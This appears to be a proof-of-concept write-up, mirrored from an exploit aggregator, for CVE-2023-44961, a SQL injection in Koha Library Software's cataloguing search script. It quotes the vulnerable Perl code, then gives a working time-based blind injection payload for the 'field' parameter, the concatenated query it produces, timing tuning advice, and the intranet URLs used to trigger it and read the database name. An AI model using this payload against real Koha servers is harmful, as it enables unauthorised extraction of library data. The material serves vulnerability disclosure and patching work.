Share
## https://sploitus.com/exploit?id=8A764324-16A8-5489-8F73-B3D80CA30E81
# CVE-2023-44961
PoC for CVE-2023-44961

# Description
This is a SQL Injection vulnerability in Koha Library Software v.23.0.5.04 and before version which allows a remote attacker to obtain arbitrary data from the koha sql server.

# Analysis

This vulnerability appears in the `intranet/cgi bin/cataloging/ysearch.pl` file of the `intranet` interface:

```perl
...
my $query = $input->param('term');
my $table = $input->param('table');
my $field = $input->param('field');

# Prevent from disclosing data
die() unless ($table eq "biblioitems"); 

...

my $dbh = C4::Context->dbh;
my $sql = qq(SELECT distinct $field
             FROM $table 
             WHERE $field LIKE ? OR $field LIKE ? or $field LIKE ?);
$sql .= qq( ORDER BY $field);
my $sth = $dbh->prepare($sql);
$sth->execute("$query%", "% $query%", "%-$query%");
...
```

When concatenating SQL statements with the `$sql` variable in the code, keyword filtering was not performed. We can achieve time-based SQL blind injection by injecting the following payload:

```
$field = 1 and if((substr(database(),1,1)='k'), sleep(1), sleep(0))
```

The sql command after concatenation is:

```sql
SELECT distinct 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0)) FROM biblioitems WHERE 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0)) LIKE "" OR 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0)) LIKE "" or 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0)) LIKE "" ORDER BY 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0))
```

Since `SELECT distinct $field FROM $table  WHERE $field LIKE ? OR $field LIKE ? or $field LIKE ?` is used to return the values of all the `$field` fields in the `$table` that meet one of the three `LIKE` conditions, it will traverse each row of data in the `$table`. 

Therefore, if you want to reduce the sleep time, set the sleep time to `1/n` (n represents the number of rows of data in the `$table`), that is, `sleep (1/n)`.

## PoC

To trigger the SQL injection vulnerability here, first ensure that there is data in the `biblioitems` table. We can add data through the following URL:

```
http://koha_ip:intranet_port/cgi-bin/koha/cataloguing/addbiblio.pl
```

I have added a piece of data here:

![](./png/add_biblio.png)

Test our SQL statements on the command line:

![](./png/test_sqlcommand.png)

It can be seen that in the `biblioitems` table, with one piece of data, the sleep is set to 1 second, and the actual sleep time is 3 seconds. 

Following this approach,  a PoC can be constructed for testing:

Access the following url to trigger:

```
http://koha_ip:intranet_port/cgi-bin/koha/cataloguing/ysearch.pl
```

![](./png/poc.png)

As shown in the figure  my database name is `koha_mykoha`.